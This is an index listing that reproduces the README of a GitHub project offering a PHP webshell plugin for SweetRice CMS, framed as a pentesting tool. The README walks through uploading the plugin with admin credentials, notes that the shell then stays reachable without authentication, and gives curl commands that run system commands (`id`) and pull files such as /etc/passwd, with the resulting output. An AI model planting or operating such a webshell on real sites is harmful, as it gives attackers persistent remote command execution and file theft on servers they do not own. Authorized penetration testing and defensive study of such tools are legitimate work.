Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/p0dalirius/sweetrice-webshell-plugin
A webshell plugin and interactive shell for pentesting a SweetRice website.
https://github.com/p0dalirius/sweetrice-webshell-plugin
cms pentest plugin sweetrice webshell
Last synced: about 1 month ago
JSON representation
A webshell plugin and interactive shell for pentesting a SweetRice website.
- Host: GitHub
- URL: https://github.com/p0dalirius/sweetrice-webshell-plugin
- Owner: p0dalirius
- Created: 2022-06-02T06:29:44.000Z (over 2 years ago)
- Default Branch: master
- Last Pushed: 2022-06-02T07:26:58.000Z (over 2 years ago)
- Last Synced: 2024-12-18T18:45:29.409Z (about 2 months ago)
- Topics: cms, pentest, plugin, sweetrice, webshell
- Language: PHP
- Homepage: https://podalirius.net/
- Size: 1.94 MB
- Stars: 6
- Watchers: 2
- Forks: 2
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- Funding: .github/FUNDING.yml
Awesome Lists containing this project
README
# SweetRice webshell plugin for RCE
A webshell plugin and interactive shell for pentesting a SweetRice website.
![]()
![]()
![]()
## Features
- [x] Webshell plugin for SweetRice.
- [x] Execute system commands via an API with `?action=exec`.
- [x] Download files from the remote system to your attacking machine with `?action=download`.## Usage
**Requirements**: You need to have the credentials of the `admin` account of the SweetRice website.
### Step 1: Upload the webshell plugin
First, login with admin rights on the SweetRice website and go to "_Plugin List_" page, at http://127.0.0.1:10080/as/?type=plugins, and upload the plugin with the "Add Plugin" form:
![](./.github/plugin_add_new.png)
Upload the plugin, and click on "_Install the plugin_":
![](./.github/install_plugin.png)
You can now access the webshell plugin to either one of these two URLs:
- (**Authenticated**) `http://127.0.0.1:10080/as/?type=plugin&plugin=WebShell`
+ You need to be authenticated as admin to access this URL.
- (**Unauthenticated**) `http://127.0.0.1:10080/_plugin/webshell/webshell.php`
+ The template of this URL is `http://127.0.0.1:10080/_plugin/ZIPNAME/webshell.php` with `ZIPNAME` being the name of the plugin zip file uploaded in SweetRice.### Step 2.1: Executing commands
You can now execute commands by sending a GET or POST request with `action=exec&cmd=id` to either one of the two URLs:
```sh
$ curl -X POST 'http://127.0.0.1:10080/_plugin/webshell/webshell.php?action=exec&cmd=id' --data "action=exec&cmd=id"
{"stdout":"uid=33(www-data) gid=33(www-data) groups=33(www-data)\n","exec":"id"}
```You can also access it by a GET request from a browser:
![](./.github/exec_code_web.png)
### Step 2.2: Downloading files
You can also download remote files by sending a GET or POST request with `action=download&cmd=/etc/passwd` to either one of the two URLs:
```sh
$ curl -X POST 'http://127.0.0.1:10080/_plugin/webshell/webshell.php' --data "action=download&path=/etc/passwd" -o-
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
mysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false
```You can also download a remote file from a browser with a GET request :
![](./.github/download_file_web.png)
### Step 3: The interactive console
When your webshell is active, you can now use the interactive [console.py](console.py) to execute commands and download remote files.
https://user-images.githubusercontent.com/79218792/171576334-8666a624-4611-4a21-a99e-691819a64329.mp4
## References
- https://www.sweetrice.xyz/